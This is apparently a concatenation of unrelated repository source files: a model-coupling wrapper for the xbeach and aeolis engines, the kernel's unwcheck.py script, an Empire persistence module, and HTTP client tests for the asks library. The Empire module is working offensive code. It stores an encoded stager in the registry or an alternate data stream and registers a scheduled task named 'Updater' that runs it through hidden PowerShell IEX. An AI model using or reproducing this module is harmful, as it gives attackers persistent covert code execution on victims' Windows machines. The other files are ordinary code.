# change working directry to location of configuration file
if not os.path.isabs(self.configfile):
self.configfile = os.path.abspath(self.configfile)
fpath, fname = os.path.split(self.configfile)
os.chdir(fpath)
logger.debug('Changed directory to "%s"' % fpath)
with open(fname, 'r') as fp:
self.config = json.load(fp)
self.tstart = self.get_config_value('time', 'start')
self.tstop = self.get_config_value('time', 'stop')
self.tout = self.get_config_value('netcdf', 'interval')
self.models = self.get_config_value('models')
else:
raise IOError('File not found: %s' % self.configfile)
def get_current_time(self):
'''Return current model time'''
return self.t
def get_end_time(self):
'''Return model stop time'''
return self.tstop
def get_start_time(self):
'''Return model start time'''
return self.tstart
def get_var(self, name):
'''Return array from model engine'''
engine, name = self._split_var(name)
return self.models[engine]['_wrapper'].get_var(name).copy()
def get_var_count(self):
raise NotImplemented(
'BMI extended function "get_var_count" is not implemented yet')
def get_var_name(self, i):
raise NotImplemented(
'BMI extended function "get_var_name" is not implemented yet')
def get_var_rank(self, name):
'''Return array rank or 0 for scalar'''
engine, name = self._split_var(name)
return self.models[engine]['_wrapper'].get_var_rank(name)
def get_var_shape(self, name):
'''Return array shape'''
engine, name = self._split_var(name)
return self.models[engine]['_wrapper'].get_var_shape(name)
def get_var_type(self, name):
'''Return type string, compatible with numpy'''
engine, name = self._split_var(name)
return self.models[engine]['_wrapper'].get_var_type(name)
def inq_compound(self, name):
raise NotImplemented(
'BMI extended function "inq_compound" is not implemented yet')
def inq_compound_field(self, name):
raise NotImplemented(
'BMI extended function "inq_compound_field" is not implemented yet')
def set_var(self, name, value):
'''Set array in model engine'''
engine, name = self._split_var(name)
self.models[engine]['_wrapper'].set_var(name, value)
def set_var_index(self, name, index, value):
raise NotImplemented(
'BMI extended function "set_var_index" is not implemented yet')
def set_var_slice(self, name, start, count, value):
raise NotImplemented(
'BMI extended function "set_var_slice" is not implemented yet')
def initialize(self):
'''Initialize model engines and configuration'''
# initialize model engines
for name, props in self.models.iteritems():
logger.info('Loading library "%s"...' % name)
# support local engines
if props.has_key('engine_path') and \
props['engine_path'] and \
os.path.isabs(props['engine_path']) and \
os.path.exists(props['engine_path']):
logger.debug('Adding library "%s" to path...' % props['engine_path'])
os.environ['LD_LIBRARY_PATH'] = props['engine_path']
os.environ['DYLD_LIBRARY_PATH'] = props['engine_path'] # Darwin
# initialize bmi wrapper
try:
# try external library
self.models[name]['_wrapper'] = BMIWrapper(
engine=props['engine'],
configfile=props['configfile'] or ''
)
except RuntimeError:
# try python package
try:
p, c = props['engine'].rsplit('.', 1)
mod = importlib.import_module(p)
engine = getattr(mod, c)
self.models[name]['_wrapper'] = engine(configfile=props['configfile'] or '')
except:
raise RuntimeError('Engine not found [%s]' % props['engine'])
# initialize time
self.models[name]['_time'] = self.t
# initialize model engine
self.models[name]['_wrapper'].initialize()
def update(self, dt=-1):
'''Step model engines into the future
Step all model engines into the future and check if engines
are at the same point in time. If not, repeat stepping into
the future of lagging engines until all engines are
(approximately) at the same point in time. Exchange data if
necessary.
Parameters
----------
dt : float
time step, use -1 for automatic time step
'''
t0 = self.t
target_time = None
engine_last = None
for engine in self.models.iterkeys():
self.models[engine]['_target'] = None
# repeat update until target time step is reached for all engines
while target_time is None or np.any([m['_time'] < target_time
for m in self.models.itervalues()]):
# determine model engine with maximum lag
engine = self._get_engine_maxlag()
e = self.models[engine]
now = e['_time']
# exchange data if another model engine is selected
try:
if engine != engine_last:
self._exchange_data(engine)
except:
logger.error('Failed to exchange data from "%s" to "%s"!' % (engine_last, engine))
logger.error(traceback.format_exc())
# step model engine in future
try:
e['_wrapper'].update(dt)
except:
logger.error('Failed to update "%s"!' % engine)
logger.error(traceback.format_exc())
# update time
e['_time'] = e['_wrapper'].get_current_time()
e['_target'] = e['_time']
logger.debug(
'Step engine "%s" from t=%0.2f to t=%0.2f into the future...' % (
engine,
now,
e['_time']))
# determine target time step after first update
if target_time is None and \
np.all([m['_target'] is not None for m in self.models.itervalues()]):
target_time = np.max([m['_time'] for m in self.models.itervalues()])
logger.debug('Set target time step to t=%0.2f' % target_time)
engine_last = engine
self.t = np.mean([m['_time'] for m in self.models.itervalues()])
logger.debug('Arrived in future at t=%0.2f' % self.t)
def finalize(self):
'''Finalize model engines'''
# finalize model engines
for name, props in self.models.iteritems():
self.models[name]['_wrapper'].finalize()
def _exchange_data(self, engine):
'''Exchange data from all model engines to a given model engine
Reads exchange configuration and looks for items where the
given model engine is in the "var_to" field and reads the
corresponding "var_from" variable from the model engine
specified by the "var_to" variable.
Parameters
----------
engine : str
model engine to write data to
'''
exchange = self.get_config_value('exchange')
if exchange is not None:
for ex in exchange:
engine_to, var_to = self._split_var(ex['var_to'])
engine_from, var_from = self._split_var(ex['var_from'])
if engine_to == engine:
logger.debug('Exchange "%s" to "%s"' % (
ex['var_from'],
ex['var_to']))
try:
val = self.models[engine_from]['_wrapper'].get_var(var_from)
except:
logger.error('Failed to get "%s" from "%s"!' % (var_from, engine_from))
logger.error(traceback.format_exc())
try:
self.models[engine_to]['_wrapper'].set_var(var_to, val)
except:
logger.error('Failed to set "%s" in "%s"!' % (var_to, engine_to))
logger.error(traceback.format_exc())
def _get_engine_maxlag(self):
'''Get model engine with maximum lag from current time
Returns
-------
str
name of model engine with larges lag
'''
lag = np.inf
engine = None
for name, props in self.models.iteritems():
if props['_time'] < lag:
lag = props['_time']
engine = name
return engine
def _split_var(self, name):
'''Split variable name in engine and variable part
Split a string into two strings where the first string is the
name of the model engine that holds the variable and the
second is the variable name itself. If the original string
contains a dot (.) the left and right side of the dot are
chosen as the engine and variable name respectively. If the
original string contains no dot the default engine is chosen
for the given variable name. If no default engine is defined
for the given variable name a ValueError is raised.
Parameters
----------
name : str
name of variable, including engine
Returns
-------
str
name of model engine
str
name of variable
Examples
--------
>>> self._split_var('xbeach.zb')
('xbeach', 'zb')
>>> self._split_var('zb')
('xbeach', 'zb')
>>> self._split_var('aeolis.zb')
('aeolis', 'zb')
>>> self._split_var('aeolis.Ct')
('aeolis', 'Ct')
>>> self._split_var('Ct')
('aeolis', 'Ct')
>>> self._split_var('aeolis.Ct.avg')
('aeolis', 'Ct.avg')
'''
parts = name.split('.')
engine = None
name = None
if len(parts) == 1:
name = parts[0]
elif len(parts) == 2:
if parts[0] in self.models.keys():
engine, name = parts
else:
name = '.'.join(parts)
else:
engine = parts[0]
name = '.'.join(parts)
if engine is None:
if name.split('.')[0] in ['Cu', 'Ct', 'supply', 'pickup', 'mass', 'uth',
'uw', 'uws', 'uwn', 'udir']:
engine = 'aeolis'
elif name.split('.')[0] in ['zb', 'zs', 'zs0', 'H']:
engine = 'xbeach'
else:
raise ValueError(
'Unknown variable "%s", specify engine using "<engine>.%s"' % (
name, name))
return engine, name
def get_config_value(self, *keys, **kwargs):
'''Get configuration values by traversing JSON structure while checking existence
Parameters
----------
keys : str
traverse into JSON configuration structure
Return
------
value form JSON configuration file or (partial) structure or None if non-existent
'''
if kwargs.has_key('cfg'):
cfg = kwargs['cfg']
else:
cfg = None
if cfg is None:
cfg = self.config
if len(keys) > 0:
if cfg.has_key(keys[0]):
cfg = self.get_config_value(*keys[1:], cfg=cfg[keys[0]])
else:
cfg = None
return cfg
@staticmethod
def get_dimensions(var):
var = var.split('.')[0]
if var in ['mass']:
dims = (u'time', u'y', u'x', u'layers', u'fractions')
elif var in ['d10', 'd50', 'd90', 'moist', 'thlyr']:
dims = (u'time', u'y', u'x', u'layers')
elif var in ['Cu', 'Ct', 'uth', 'supply', 'pickup', 'p']:
dims = (u'time', u'y', u'x', u'fractions')
elif var in ['x', 'z', 'zb', 'zs', 'uw', 'udir', 'H']:
dims = (u'time', u'y', u'x')
elif var in []:
dims = (u'time',)
else:
dims = (u'time', u'y', u'x')
return dims
| gpl-2.0 |
awifi-dev/android_kernel_lge_palman | arch/ia64/scripts/unwcheck.py | 13143 | 1714 | #!/usr/bin/python
#
# Usage: unwcheck.py FILE
#
# This script checks the unwind info of each function in file FILE
# and verifies that the sum of the region-lengths matches the total
# length of the function.
#
# Based on a shell/awk script originally written by Harish Patil,
# which was converted to Perl by Matthew Chapman, which was converted
# to Python by David Mosberger.
#
import os
import re
import sys
if len(sys.argv) != 2:
print "Usage: %s FILE" % sys.argv[0]
sys.exit(2)
readelf = os.getenv("READELF", "readelf")
start_pattern = re.compile("<([^>]*)>: \[0x([0-9a-f]+)-0x([0-9a-f]+)\]")
rlen_pattern = re.compile(".*rlen=([0-9]+)")
def check_func (func, slots, rlen_sum):
if slots != rlen_sum:
global num_errors
num_errors += 1
if not func: func = "[%#x-%#x]" % (start, end)
print "ERROR: %s: %lu slots, total region length = %lu" % (func, slots, rlen_sum)
return
num_funcs = 0
num_errors = 0
func = False
slots = 0
rlen_sum = 0
for line in os.popen("%s -u %s" % (readelf, sys.argv[1])):
m = start_pattern.match(line)
if m:
check_func(func, slots, rlen_sum)
func = m.group(1)
start = long(m.group(2), 16)
end = long(m.group(3), 16)
slots = 3 * (end - start) / 16
rlen_sum = 0L
num_funcs += 1
else:
m = rlen_pattern.match(line)
if m:
rlen_sum += long(m.group(1))
check_func(func, slots, rlen_sum)
if num_errors == 0:
print "No errors detected in %u functions." % num_funcs
else:
if num_errors > 1:
err="errors"
else:
err="error"
print "%u %s detected in %u functions." % (num_errors, err, num_funcs)
sys.exit(1)
| gpl-2.0 |
jaredhaight/Empire | lib/modules/persistence/userland/schtasks.py | 9 | 9526 | import os
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-Schtasks',
'Author': ['@mattifestation', '@harmj0y'],
'Description': ('Persist a stager (or script) using schtasks. This has a moderate detection/removal rating.'),
'Background' : False,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : False,
'MinPSVersion' : '2',
'Comments': [
'https://github.com/mattifestation/PowerSploit/blob/master/Persistence/Persistence.psm1'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : False,
'Value' : ''
},
'DailyTime' : {
'Description' : 'Daily time to trigger the script (HH:mm).',
'Required' : False,
'Value' : '09:00'
},
'IdleTime' : {
'Description' : 'User idle time (in minutes) to trigger script.',
'Required' : False,
'Value' : ''
},
'TaskName' : {
'Description' : 'Name to use for the schtask.',
'Required' : True,
'Value' : 'Updater'
},
'RegPath' : {
'Description' : 'Registry location to store the script code. Last element is the key name.',
'Required' : False,
'Value' : 'HKCU:\Software\Microsoft\Installer\debug'
},
'ADSPath' : {
'Description' : 'Alternate-data-stream location to store the script code.',
'Required' : False,
'Value' : ''
},
'ExtFile' : {
'Description' : 'Use an external file for the payload instead of a stager.',
'Required' : False,
'Value' : ''
},
'Cleanup' : {
'Description' : 'Switch. Cleanup the trigger and any script from specified location.',
'Required' : False,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
listenerName = self.options['Listener']['Value']
# trigger options
dailyTime = self.options['DailyTime']['Value']
idleTime = self.options['IdleTime']['Value']
taskName = self.options['TaskName']['Value']
# storage options
regPath = self.options['RegPath']['Value']
adsPath = self.options['ADSPath']['Value']
# management options
extFile = self.options['ExtFile']['Value']
cleanup = self.options['Cleanup']['Value']
# staging options
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
statusMsg = ""
locationString = ""
# for cleanup, remove any script from the specified storage location
# and remove the specified trigger
if cleanup.lower() == 'true':
if adsPath != '':
# remove the ADS storage location
if ".txt" not in adsPath:
print helpers.color("[!] For ADS, use the form C:\\users\\john\\AppData:blah.txt")
return ""
script = "Invoke-Command -ScriptBlock {cmd /C \"echo x > "+adsPath+"\"};"
else:
# remove the script stored in the registry at the specified reg path
path = "\\".join(regPath.split("\\")[0:-1])
name = regPath.split("\\")[-1]
script = "$RegPath = '"+regPath+"';"
script += "$parts = $RegPath.split('\\');"
script += "$path = $RegPath.split(\"\\\")[0..($parts.count -2)] -join '\\';"
script += "$name = $parts[-1];"
script += "$null=Remove-ItemProperty -Force -Path $path -Name $name;"
script += "schtasks /Delete /F /TN "+taskName+";"
script += "'Schtasks persistence removed.'"
return script
if extFile != '':
# read in an external file as the payload and build a
# base64 encoded version as encScript
if os.path.exists(extFile):
f = open(extFile, 'r')
fileData = f.read()
f.close()
# unicode-base64 encode the script for -enc launching
encScript = helpers.enc_powershell(fileData)
statusMsg += "using external file " + extFile
else:
print helpers.color("[!] File does not exist: " + extFile)
return ""
else:
# if an external file isn't specified, use a listener
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print helpers.color("[!] Invalid listener: " + listenerName)
return ""
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = self.mainMenu.stagers.generate_launcher(listenerName, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
encScript = launcher.split(" ")[-1]
statusMsg += "using listener " + listenerName
if adsPath != '':
# store the script in the specified alternate data stream location
if ".txt" not in adsPath:
print helpers.color("[!] For ADS, use the form C:\\users\\john\\AppData:blah.txt")
return ""
script = "Invoke-Command -ScriptBlock {cmd /C \"echo "+encScript+" > "+adsPath+"\"};"
locationString = "$(cmd /c \''\''more < "+adsPath+"\''\''\'')"
else:
# otherwise store the script into the specified registry location
path = "\\".join(regPath.split("\\")[0:-1])
name = regPath.split("\\")[-1]
statusMsg += " stored in " + regPath
script = "$RegPath = '"+regPath+"';"
script += "$parts = $RegPath.split('\\');"
script += "$path = $RegPath.split(\"\\\")[0..($parts.count -2)] -join '\\';"
script += "$name = $parts[-1];"
script += "$null=Set-ItemProperty -Force -Path $path -Name $name -Value "+encScript+";"
# note where the script is stored
locationString = "(gp "+path+" "+name+")."+name
# built the command that will be triggered by the schtask
triggerCmd = "'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NonI -W hidden -c \\\"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String("+locationString+")))\\\"'"
# sanity check to make sure we haven't exceeded the cmd.exe command length max
if len(triggerCmd) > 259:
print helpers.color("[!] Warning: trigger command exceeds the maximum of 259 characters.")
return ""
if idleTime != '':
script += "schtasks /Create /F /SC ONIDLE /I "+idleTime+" /TN "+taskName+" /TR "+triggerCmd+";"
statusMsg += " with "+taskName+" idle trigger on " + idleTime + "."
else:
# otherwise assume we're doing a daily trigger
script += "schtasks /Create /F /SC DAILY /ST "+dailyTime+" /TN "+taskName+" /TR "+triggerCmd+";"
statusMsg += " with "+taskName+" daily trigger at " + dailyTime + "."
script += "'Schtasks persistence established "+statusMsg+"'"
return script | bsd-3-clause |
theelous3/asks | tests/test_anyio.py | 1 | 18950 | # pylint: disable=wrong-import-position
import ssl
from os import path
from functools import partial
from pathlib import Path
import h11
import pytest
from anyio import create_task_group, open_file, EndOfStream
from overly import (
Server,
ssl_socket_wrapper,
default_ssl_cert,
send_200,
send_303,
send_400,
send_500,
delay,
send_request_as_json,
accept_cookies_and_respond,
send_gzip,
send_deflate,
send_chunked,
send_200_blank_headers,
finish,
HttpMethods,
)
import asks
from asks.request_object import RequestProcessor
from asks.errors import TooManyRedirects, BadStatus, RequestTimeout
pytestmark = pytest.mark.anyio
_TEST_LOC = ("localhost", 25001)
_SSL_CONTEXT = ssl.create_default_context(cadata=default_ssl_cert)
@pytest.fixture
def server(request):
srv = Server(_TEST_LOC, **request.param)
srv.daemon = True
srv.start()
srv.ready_to_go.wait()
yield srv
srv.kill_threads = True
srv.join()
@pytest.mark.parametrize('server', [dict(steps=[send_200, finish])], indirect=True)
async def test_http_get(server):
r = await asks.get(server.http_test_url)
assert r.status_code == 200
# GET tests
@pytest.mark.parametrize('server', [
dict(steps=[send_200, finish], socket_wrapper=ssl_socket_wrapper)
], indirect=True)
async def test_https_get(server, caplog):
import logging
caplog.set_level(logging.DEBUG)
# If we use ssl_context= to trust the CA, then we can successfully do a
# GET over https.
r = await asks.get(server.https_test_url, ssl_context=_SSL_CONTEXT)
assert r.status_code == 200
@pytest.mark.parametrize('server', [
dict(steps=[send_200, finish], socket_wrapper=ssl_socket_wrapper)
], indirect=True)
async def test_https_get_checks_cert(server):
try:
expected_error = ssl.SSLCertVerificationError
except AttributeError:
# If we're running in Python <3.7, we won't have the specific error
# that will be raised, but we can expect it to raise an SSLError
# nonetheless
expected_error = ssl.SSLError
# The server's certificate isn't signed by any real CA. By default, asks
# should notice that, and raise an error.
with pytest.raises(expected_error):
await asks.get(server.https_test_url)
# # async def test_bad_www_and_schema_get():
# r = await asks.get('http://reddit.com')
# assert r.status_code == 200
@pytest.mark.parametrize('server', [dict(steps=[send_400, finish])], indirect=True)
async def test_http_get_client_error(server):
r = await asks.get(server.http_test_url)
with pytest.raises(BadStatus) as excinfo:
r.raise_for_status()
assert excinfo.match("400 Client Error: BAD REQUEST")
assert excinfo.value.status_code == 400
@pytest.mark.parametrize('server', [dict(steps=[send_500, finish])], indirect=True)
async def test_http_get_server_error(server):
r = await asks.get(server.http_test_url)
with pytest.raises(BadStatus) as excinfo:
r.raise_for_status()
assert excinfo.match("500 Server Error: INTERNAL SERVER ERROR")
assert excinfo.value.status_code == 500
# Redirect tests
@pytest.mark.parametrize('server', [
dict(
max_requests=4,
steps=[
[(HttpMethods.GET, "/redirect_1"), send_303, finish],
[(HttpMethods.GET, "/"), send_200, finish],
[(HttpMethods.GET, "/redirect_1"), send_303, finish],
[(HttpMethods.GET, "/"), send_200, finish],
],
ordered_steps=True,
)
], indirect=True)
async def test_http_redirect(server):
r = await asks.get(server.http_test_url + "/redirect_1")
assert len(r.history) == 1
# make sure history doesn't persist across responses
r.history.append("not a response obj")
r = await asks.get(server.http_test_url + "/redirect_1")
assert len(r.history) == 1
@pytest.mark.parametrize('server', [
dict(
max_requests=3,
steps=[
[
(HttpMethods.GET, "/redirect_max"),
partial(send_303, headers=[("location", "redirect_max1")]),
finish,
],
[
(HttpMethods.GET, "/redirect_max1"),
partial(send_303, headers=[("location", "redirect_max")]),
finish,
],
],
)
], indirect=True)
async def test_http_max_redirect_error(server):
with pytest.raises(TooManyRedirects):
await asks.get(server.http_test_url + "/redirect_max", max_redirects=1)
@pytest.mark.parametrize('server', [
dict(
max_requests=2,
steps=[
[
(HttpMethods.GET, "/path/redirect"),
partial(send_303, headers=[("location", "../foo/bar")]),
finish,
],
[(HttpMethods.GET, "/foo/bar"), send_200, finish],
],
)
], indirect=True)
async def test_redirect_relative_url(server):
r = await asks.get(server.http_test_url + "/path/redirect", max_redirects=1)
assert len(r.history) == 1
assert r.url == "http://{0}:{1}/foo/bar".format(*_TEST_LOC)
@pytest.mark.parametrize('server', [
dict(
max_requests=2,
steps=[
[
(HttpMethods.GET, "/redirect_once"),
partial(send_303, headers=[("location", "/")]),
finish,
],
[(HttpMethods.GET, "/"), send_200, finish],
],
)
], indirect=True)
async def test_http_under_max_redirect(server):
r = await asks.get(server.http_test_url + "/redirect_once", max_redirects=2)
assert r.status_code == 200
@pytest.mark.parametrize('server', [
dict(
max_requests=1,
steps=[
[
(HttpMethods.GET, "/redirect_once"),
partial(send_303, headers=[("location", "/")]),
finish,
],
],
)
], indirect=True)
async def test_dont_follow_redirects(server):
r = await asks.get(server.http_test_url + "/redirect_once", follow_redirects=False)
assert r.status_code == 303
assert r.headers["location"] == "/"
# Timeout tests
@pytest.mark.parametrize('server', [dict(steps=[delay(2), send_200, finish])], indirect=True)
async def test_http_timeout_error(server):
with pytest.raises(RequestTimeout):
await asks.get(server.http_test_url, timeout=1)
@pytest.mark.parametrize('server', [dict(steps=[send_200, finish])], indirect=True)
async def test_http_timeout(server):
r = await asks.get(server.http_test_url, timeout=10)
assert r.status_code == 200
# Param set test
@pytest.mark.parametrize('server', [dict(steps=[send_request_as_json, finish])], indirect=True)
async def test_param_dict_set(server):
r = await asks.get(server.http_test_url, params={"cheese": "the best"})
j = r.json()
assert next(v == "the best" for k, v in j["params"] if k == "cheese")
# Data set test
@pytest.mark.parametrize('server', [dict(steps=[send_request_as_json, finish])], indirect=True)
async def test_data_dict_set(server):
r = await asks.post(server.http_test_url, data={"cheese": "please bby"})
j = r.json()
assert next(v == "please bby" for k, v in j["form"] if k == "cheese")
# Cookie send test
@pytest.mark.parametrize('server', [
dict(steps=[accept_cookies_and_respond, finish])
], indirect=True)
async def test_cookie_dict_send(server):
cookies = {"Test-Cookie": "Test Cookie Value", "koooookie": "pie"}
r = await asks.get(server.http_test_url, cookies=cookies)
for cookie in r.cookies:
assert cookie.name in cookies
if " " in cookie.value:
assert cookie.value == '"' + cookies[cookie.name] + '"'
else:
assert cookie.value == cookies[cookie.name]
# Custom headers test
@pytest.mark.parametrize('server', [dict(steps=[send_request_as_json, finish])], indirect=True)
async def test_header_set(server):
r = await asks.get(
server.http_test_url, headers={"Asks-Header": "Test Header Value"}
)
j = r.json()
assert any(k == "asks-header" for k, _ in j["headers"])
assert "cOntenT-tYPe" in r.headers
# File send test
TEST_DIR = path.dirname(path.abspath(__file__))
TEST_FILE1 = path.join(TEST_DIR, "test_file1.txt")
TEST_FILE2 = path.join(TEST_DIR, "test_file2")
@pytest.mark.parametrize('server', [dict(steps=[send_request_as_json, finish])], indirect=True)
async def test_file_send_single(server):
r = await asks.post(server.http_test_url, files={"file_1": TEST_FILE1})
j = r.json()
assert any(file_data["name"] == "file_1" for file_data in j["files"])
file_data = next(
file_data for file_data in j["files"] if file_data["name"] == "file_1"
)
assert file_data["file"] == "Compooper"
@pytest.mark.parametrize('server', [dict(steps=[send_request_as_json, finish])], indirect=True)
async def test_file_send_double(server):
r = await asks.post(
server.http_test_url, files={"file_1": TEST_FILE1, "file_2": TEST_FILE2}
)
j = r.json()
assert any(file_data["name"] == "file_1" for file_data in j["files"])
assert any(file_data["name"] == "file_2" for file_data in j["files"])
file_data_1 = next(
file_data for file_data in j["files"] if file_data["name"] == "file_1"
)
file_data_2 = next(
file_data for file_data in j["files"] if file_data["name"] == "file_2"
)
assert file_data_1["file"] == "Compooper"
assert file_data_2["file"] == "My slug <3"
@pytest.mark.parametrize('server', [dict(steps=[send_request_as_json, finish])], indirect=True)
async def test_file_send_file_and_form_data(server):
r = await asks.post(
server.http_test_url,
files={"file_1": TEST_FILE1, "data_1": "watwatwatwat=yesyesyes"},
)
j = r.json()
assert any(file_data["name"] == "file_1" for file_data in j["files"])
assert any(form_data["name"] == "data_1" for form_data in j["forms"])
file_data_1 = next(
file_data for file_data in j["files"] if file_data["name"] == "file_1"
)
assert file_data_1["file"] == "Compooper"
form_data_1 = next(
form_data for form_data in j["forms"] if form_data["name"] == "data_1"
)
assert form_data_1["form_data"] == "watwatwatwat=yesyesyes"
# File send test new multipart API
TEST_DIR = path.dirname(path.abspath(__file__))
TEST_FILE1 = path.join(TEST_DIR, "test_file1.txt")
TEST_FILE2 = path.join(TEST_DIR, "test_file2")
@pytest.mark.parametrize('server', [dict(steps=[send_request_as_json, finish])], indirect=True)
async def test_multipart_send_single(server):
r = await asks.post(server.http_test_url, multipart={"file_1": Path(TEST_FILE1)})
j = r.json()
assert any(file_data["name"] == "file_1" for file_data in j["files"])
file_data = next(
file_data for file_data in j["files"] if file_data["name"] == "file_1"
)
assert file_data["file"] == "Compooper"
@pytest.mark.parametrize('server', [dict(steps=[send_request_as_json, finish])], indirect=True)
async def test_multipart_send_single_already_open(server):
with open(TEST_FILE1, "rb") as f:
r = await asks.post(server.http_test_url, multipart={"file_1": f})
j = r.json()
assert any(file_data["name"] == "file_1" for file_data in j["files"])
file_data = next(
file_data for file_data in j["files"] if file_data["name"] == "file_1"
)
assert file_data["file"] == "Compooper"
@pytest.mark.parametrize('server', [dict(steps=[send_request_as_json, finish])], indirect=True)
async def test_multipart_send_single_already_open_async(server):
async with await open_file(TEST_FILE1, "rb") as f:
r = await asks.post(server.http_test_url, multipart={"file_1": f})
j = r.json()
assert any(file_data["name"] == "file_1" for file_data in j["files"])
file_data = next(
file_data for file_data in j["files"] if file_data["name"] == "file_1"
)
assert file_data["file"] == "Compooper"
@pytest.mark.parametrize('server', [dict(steps=[send_request_as_json, finish])], indirect=True)
async def test_multipart_send_raw_bytes(server):
r = await asks.post(
server.http_test_url,
multipart={
"file_1": asks.multipart.MultipartData(
b"Compooper", basename="in_memory.txt",
)
},
)
j = r.json()
assert any(file_data["name"] == "file_1" for file_data in j["files"])
file_data = next(
file_data for file_data in j["files"] if file_data["name"] == "file_1"
)
assert file_data["file"] == "Compooper"
@pytest.mark.parametrize('server', [dict(steps=[send_request_as_json, finish])], indirect=True)
async def test_multipart_send_double(server):
r = await asks.post(
server.http_test_url,
multipart={"file_1": Path(TEST_FILE1), "file_2": Path(TEST_FILE2)},
)
j = r.json()
assert any(file_data["name"] == "file_1" for file_data in j["files"])
assert any(file_data["name"] == "file_2" for file_data in j["files"])
file_data_1 = next(
file_data for file_data in j["files"] if file_data["name"] == "file_1"
)
file_data_2 = next(
file_data for file_data in j["files"] if file_data["name"] == "file_2"
)
assert file_data_1["file"] == "Compooper"
assert file_data_2["file"] == "My slug <3"
@pytest.mark.parametrize('server', [dict(steps=[send_request_as_json, finish])], indirect=True)
async def test_multipart_send_file_and_form_data(server):
r = await asks.post(
server.http_test_url,
multipart={"file_1": Path(TEST_FILE1), "data_1": "watwatwatwat=yesyesyes"},
)
j = r.json()
assert any(file_data["name"] == "file_1" for file_data in j["files"])
assert any(form_data["name"] == "data_1" for form_data in j["forms"])
file_data_1 = next(
file_data for file_data in j["files"] if file_data["name"] == "file_1"
)
assert file_data_1["file"] == "Compooper"
form_data_1 = next(
form_data for form_data in j["forms"] if form_data["name"] == "data_1"
)
assert form_data_1["form_data"] == "watwatwatwat=yesyesyes"
# JSON send test
@pytest.mark.parametrize('server', [dict(steps=[send_request_as_json, finish])], indirect=True)
async def test_json_send(server):
r = await asks.post(
server.http_test_url, json={"key_1": True, "key_2": "cheesestring"}
)
j = r.json()
json_1 = next(iter(j["json"]))
assert json_1["json"]["key_1"] is True
assert json_1["json"]["key_2"] == "cheesestring"
# Test decompression
@pytest.mark.parametrize('server', [
dict(steps=[partial(send_gzip, data="wolowolowolo"), finish])
], indirect=True)
async def test_gzip(server):
r = await asks.get(server.http_test_url)
assert r.text == "wolowolowolo"
@pytest.mark.parametrize('server', [
dict(steps=[partial(send_deflate, data="wolowolowolo"), finish])
], indirect=True)
async def test_deflate(server):
r = await asks.get(server.http_test_url)
assert r.text == "wolowolowolo"
# Test chunks and streaming
@pytest.mark.parametrize('server', [
dict(steps=[partial(send_chunked, data=["ham "] * 10), finish])
], indirect=True)
async def test_chunked(server):
r = await asks.get(server.http_test_url)
assert r.text == "ham ham ham ham ham ham ham ham ham ham "
@pytest.mark.parametrize('server', [
dict(steps=[partial(send_chunked, data=["ham "] * 10), finish])
], indirect=True)
async def test_stream(server):
data = b""
r = await asks.get(server.http_test_url, stream=True)
async for chunk in r.body:
data += chunk
assert data == b"ham ham ham ham ham ham ham ham ham ham "
# Test callback
@pytest.mark.parametrize('server', [
dict(steps=[partial(send_chunked, data=["ham "] * 10), finish])
], indirect=True)
async def test_callback(server):
async def callback_example(chunk):
nonlocal callback_data
callback_data += chunk
callback_data = b""
await asks.get(server.http_test_url, callback=callback_example)
assert callback_data == b"ham ham ham ham ham ham ham ham ham ham "
# Test connection close without content-length and transfer-encoding
@pytest.mark.parametrize('server', [
dict(
steps=[partial(send_200_blank_headers, headers=[("connection", "close")]), finish],
)
], indirect=True)
async def test_connection_close_no_content_len(server):
r = await asks.get(server.http_test_url)
assert r.text == "200"
# Session Tests
# =============
# Test Session with two pooled connections on ten get requests.
@pytest.mark.parametrize('server', [
dict(
steps=[partial(send_200_blank_headers, headers=[("connection", "close")]), finish],
max_requests=10,
)
], indirect=True)
async def test_session_smallpool(server):
async def worker(s):
r = await s.get(path="/get")
assert r.status_code == 200
s = asks.Session(server.http_test_url, connections=2)
async with create_task_group() as g:
for _ in range(10):
await g.spawn(worker, s)
# Test stateful Session
# TODO check the "" quoting of cookies here (probably in overly)
@pytest.mark.parametrize('server', [
dict(steps=[accept_cookies_and_respond, finish])
], indirect=True)
async def test_session_stateful(server):
s = asks.Session(server.http_test_url, persist_cookies=True)
await s.get(cookies={"Test-Cookie": "Test Cookie Value"})
assert ":".join(str(x) for x in _TEST_LOC) in s._cookie_tracker.domain_dict.keys()
assert (
s._cookie_tracker.domain_dict[":".join(str(x) for x in _TEST_LOC)][0].value
== '"Test Cookie Value"'
)
# Test session instantiates outside event loop
def test_instantiate_session_outside_of_event_loop():
try:
asks.Session()
except RuntimeError:
pytest.fail("Could not instantiate Session outside of event loop")
async def test_session_unknown_kwargs():
with pytest.raises(TypeError, match=r"request\(\) got .*"):
session = asks.Session("https://httpbin.org/get")
await session.request("GET", ko=7, foo=0, bar=3, shite=3)
pytest.fail("Passing unknown kwargs does not raise TypeError")
async def test_recv_event_anyio2_end_of_stream():
class MockH11Connection:
def __init__(self):
self.data = None
def next_event(self):
if self.data == b"":
return h11.PAUSED
else:
return h11.NEED_DATA
def receive_data(self, data):
self.data = data
class MockSock:
def receive(self):
raise EndOfStream
req = RequestProcessor(None, "get", "toot-toot", None)
req.sock = MockSock()
h11_connection = MockH11Connection()
